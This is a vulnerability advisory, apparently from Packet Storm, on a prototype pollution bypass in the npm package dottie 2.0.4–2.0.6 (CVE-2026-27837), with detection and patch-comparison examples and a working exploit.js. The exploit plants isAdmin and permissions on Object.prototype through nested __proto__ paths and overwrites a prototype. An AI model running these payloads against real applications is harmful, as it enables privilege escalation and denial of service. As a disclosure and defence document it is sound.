📄 dottie 2.0.6 Prototype Pollution Bypass

Published 05 Mar 2026 00:00:00, reported by indoushka. Type: packetstorm (source: packetstorm.news). 122 views.

Dottie 2.0.4–2.0.6 permits prototype pollution via nested __proto__ segments in set and transform.

Related

Family                  | Title                                                                                                          | Published
IBM Security Bulletins  | Security Bulletin: Multiple vulnerabilities in IBM watsonx Orchestrate Developer Edition                       | 7 Apr 2026 07:08
IBM Security Bulletins  | Security Bulletin: Security Vulnerabilities have been found in IBM Verify Identity Access Digital Credentials   | 31 Mar 2026 00:38
ATTACKERKB              | CVE-2026-27837                                                                                                 | 26 Feb 2026 00:19
Circl                   | CVE-2023-26132                                                                                                 | 26 Feb 2026 02:02
Circl                   | CVE-2026-27837                                                                                                 | 26 Feb 2026 01:53
CNNVD                   | dottie security vulnerability                                                                                  | 10 Jun 2023 00:00
CNNVD                   | dottie security vulnerability                                                                                  | 26 Feb 2026 00:00
CVE                     | CVE-2023-26132                                                                                                 | 10 Jun 2023 05:00
CVE                     | CVE-2026-27837                                                                                                 | 26 Feb 2026 00:19
Cvelist                 | CVE-2023-26132                                                                                                 | 10 Jun 2023 05:00
=============================================================================================================================================
    | # Title     : dottie 2.0.4–2.0.6 Incomplete Prototype Pollution Allows Bypass via Nested __proto__ Segments                               |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.npmjs.com/package/dottie                                                                                        |
    =============================================================================================================================================
    
    [+] Summary    :  CVE-2026-27837 covers an incomplete patch in dottie versions 2.0.4 through 2.0.6: the fix attempted for the original prototype pollution issue, CVE-2023-26132, does not fully close it.
    
    The protection added in commit 7d3aee1 validates only the first segment of a dot-separated property path against dangerous keys such as __proto__; the remaining segments are never inspected. An attacker can therefore bypass the guard by placing __proto__ in any position other than the first (e.g., user.__proto__.isAdmin): the setter creates (or reuses) the intermediate object, follows its inherited __proto__ link, which is Object.prototype, and writes the final segment there.
    
    As a result, both:
    
      - dottie.set()
      - dottie.transform()
    
    remain vulnerable to prototype pollution.
    
    [+] Impact
    
    An attacker controlling object paths can:
    
      - Inject properties into Object.prototype, which every plain object in the process then inherits
      - Escalate privileges (e.g., force isAdmin = true on every object)
      - Manipulate application logic that treats an absent property as "not set"
      - Inject arbitrary inherited permissions
      - Overwrite an object's prototype, altering or removing the behaviour it inherits, up to a Denial of Service (DoS)
    
    Because polluted properties are inherited rather than owned, checks that enumerate an object's own keys (Object.keys(), hasOwnProperty()) do not list them, while ordinary property access (obj.isAdmin) and the `in` operator do see them. Code that audits its objects by their own keys therefore never notices the injected value, which makes the pollution difficult to detect.
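    The following is an added example, not part of the advisory or of dottie, showing the detection point made above: the victim object never owns the injected key, so enumeration misses it, and the reliable check is a diff of Object.prototype's own property names against a baseline taken at startup. The nested-__proto__ write is reproduced directly on a plain object (no dottie needed) and the helper names are this example's own.

```javascript
// Snapshot of Object.prototype's own property names, taken before any untrusted
// input is processed. Assumes nothing legitimate extends Object.prototype later.
const PROTOTYPE_BASELINE = new Set(Object.getOwnPropertyNames(Object.prototype));

// Own property names that have appeared on Object.prototype since the baseline.
function pollutedKeys() {
  return Object.getOwnPropertyNames(Object.prototype).filter((k) => !PROTOTYPE_BASELINE.has(k));
}

// How `key` looks from the perspective of an object the attacker never touched.
// Each field is one kind of check an application might rely on.
function visibility(obj, key) {
  return {
    own: Object.prototype.hasOwnProperty.call(obj, key),  // hasOwnProperty-style check
    listed: Object.keys(obj).includes(key),               // enumeration of own keys
    reachable: key in obj,                                // `in` walks the prototype chain
    value: obj[key],                                      // plain property access
  };
}

// Constructed stand-in for the advisory's bypass: writing through the inherited
// __proto__ link of a fresh object lands on Object.prototype.
function simulateNestedProtoWrite(key, value) {
  const user = {};
  user['__proto__'][key] = value;   // same effect as Object.prototype[key] = value
  return user;
}

// Removes every key added since the baseline and returns what was removed.
function cleanupPollution() {
  const removed = pollutedKeys();
  for (const k of removed) delete Object.prototype[k];
  return removed;
}

// Runs the whole detection flow and returns the observations.
function runDetection() {
  const beforeKeys = pollutedKeys();              // clean process: []
  simulateNestedProtoWrite('isAdmin', true);
  const victim = {};                              // unrelated object
  const seen = visibility(victim, 'isAdmin');     // own:false listed:false reachable:true value:true
  const detected = pollutedKeys();                // ['isAdmin']
  const removed = cleanupPollution();
  return { beforeKeys, seen, detected, removed, after: pollutedKeys() };
}

console.log(JSON.stringify(runDetection(), null, 2));
```

    The baseline diff is cheap enough to run after each batch of untrusted input in a test harness or a canary request. For prevention rather than detection, Node's `--disable-proto=throw` flag makes the `__proto__` accessor throw, and `Object.freeze(Object.prototype)` blocks writes to it entirely; both are process-wide settings that need testing against the dependency tree before use.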
    
    [+] Affected Versions
    
      - 2.0.4
      - 2.0.5
      - 2.0.6
    
    [+] Fixed Version
    
      - 2.0.7
    
    Version 2.0.7 validates all path segments, properly blocking dangerous keys regardless of their position.
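    To make the difference between the incomplete guard and the complete one concrete, here is an added example (not dottie's code): a minimal dot-path setter shaped like the walk dottie.set() performs, paired with the two guards the advisory contrasts. The guard conditions follow the advisory's description (first segment only versus every segment) rather than dottie's actual source, and the example goes one step beyond the text by also covering the constructor/prototype route, the other well-known way to reach Object.prototype from a nested path.

```javascript
const DANGEROUS_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);

// Shared walker: creates intermediate objects as needed and assigns the last segment.
// Like the vulnerable walker, an existing value at a segment (including the inherited
// __proto__ link or the constructor function) is followed rather than replaced.
function walkAndSet(target, pieces, value) {
  let current = target;
  for (let i = 0; i < pieces.length; i++) {
    const piece = pieces[i];
    if (i === pieces.length - 1) {
      current[piece] = value;
    } else {
      if (current[piece] === undefined || current[piece] === null) current[piece] = {};
      current = current[piece];
    }
  }
  return target;
}

// Incomplete guard (the 2.0.4-2.0.6 behaviour as described): only pieces[0] is checked.
function setWithFirstSegmentGuard(target, path, value) {
  const pieces = path.split('.');
  if (DANGEROUS_SEGMENTS.has(pieces[0])) throw new Error(`rejected path: ${path}`);
  return walkAndSet(target, pieces, value);
}

// Complete guard (the 2.0.7 behaviour as described): every segment is checked.
function setWithAllSegmentsGuard(target, path, value) {
  const pieces = path.split('.');
  for (const piece of pieces) {
    if (DANGEROUS_SEGMENTS.has(piece)) throw new Error(`rejected path: ${path}`);
  }
  return walkAndSet(target, pieces, value);
}

// Applies an attacker-controlled path under one guard and reports the outcome as seen
// from an unrelated object (`witness`), cleaning Object.prototype afterwards.
function outcome(setter, path) {
  const witness = {};
  try {
    setter({}, path, true);
    return witness.isAdmin === true ? 'polluted Object.prototype' : 'no pollution';
  } catch (e) {
    return 'blocked';
  } finally {
    delete Object.prototype.isAdmin;
  }
}

function compareGuards(path) {
  return {
    path,
    firstSegmentGuard: outcome(setWithFirstSegmentGuard, path),
    allSegmentsGuard: outcome(setWithAllSegmentsGuard, path),
  };
}

const ATTACK_PATHS = [
  '__proto__.isAdmin',                  // caught by both guards
  'user.__proto__.isAdmin',             // the advisory's bypass: second segment is unchecked
  'user.constructor.prototype.isAdmin', // same flaw via the constructor route
  'user.isAdmin',                       // benign path, allowed by both
];

for (const p of ATTACK_PATHS) console.log(compareGuards(p));
```

    Checking every segment is the fix; as defence in depth, application code that builds nested objects from untrusted keys can also refuse to follow any segment that is not an own property of the current object (Object.prototype.hasOwnProperty.call) or build containers with Object.create(null) so there is no prototype to reach.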
    				  
    [+] POC   :  exploit.js 
    
    // Run with: node exploit.js against a vulnerable release (2.0.4 - 2.0.6), e.g. npm install dottie@2.0.6
    const dottie = require('dottie');
    
    console.log("=== Scenario 1: dottie.set() Bypass ===");
    
    // The first segment ("user") passes the guard; "__proto__" in second position is never checked.
    const session = {};
    const path = "user.__proto__.isAdmin"; 
    dottie.set(session, path, true);
    console.log("Resulting Object Structure:");
    console.log("- session.user.isAdmin:", session.user.isAdmin);                            // true
    console.log("- Is 'isAdmin' an own property?:", session.user.hasOwnProperty('isAdmin')); // false: it lives on Object.prototype
    console.log("- Object.keys(session.user):", Object.keys(session.user));                  // []: enumeration does not list it
    console.log("- Unrelated object ({}).isAdmin:", ({}).isAdmin);                           // true: the pollution is process-wide
    
    if (session.user.isAdmin) {
        console.log("CRITICAL: Unauthorized access granted! (Admin Privileges)");
    }
    delete Object.prototype.isAdmin; // undo the pollution so the next scenario starts clean
    
    console.log("\n" + "-".repeat(40) + "\n");
    
    console.log("=== Scenario 2: dottie.transform() Bypass ===");
    
    // transform() splits every dotted key and builds nested objects with the same unguarded walk.
    const maliciousData = {
        "profile.name": "GuestUser",
        "profile.__proto__.permissions": ["read", "write", "delete"]
    };
    
    const transformed = dottie.transform(maliciousData);
    
    console.log("Transformed Profile:");
    console.log("- Name:", transformed.profile.name);
    console.log("- Permissions:", transformed.profile.permissions); // inherited from Object.prototype, not set on profile
    if (transformed.profile.permissions.includes("delete")) {
        console.log("CRITICAL: User can delete records due to injected prototype property!");
    }
    delete Object.prototype.permissions;
    
    console.log("\n=== Scenario 3: Denial of Service (DoS) ===");
    try {
        const crashObj = {};
    
        // With "__proto__" as the final segment the assignment does not add a property: it
        // replaces the prototype of crashObj.data, so an attacker chooses what it inherits.
        dottie.set(crashObj, "data.__proto__", {}); 
        console.log("Prototype overwritten successfully.");
        console.log("- Prototype still Object.prototype?:", Object.getPrototypeOf(crashObj.data) === Object.prototype); // false
    } catch (e) {
        console.log("Error during DoS attempt:", e.message);
    }
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Published 05 Mar 2026 00:00 (current)
Vulners AI Score: 6 (Medium risk)
CVSS 3.1: 7.5 - 9.8
EPSS: 0.00165
Views: 122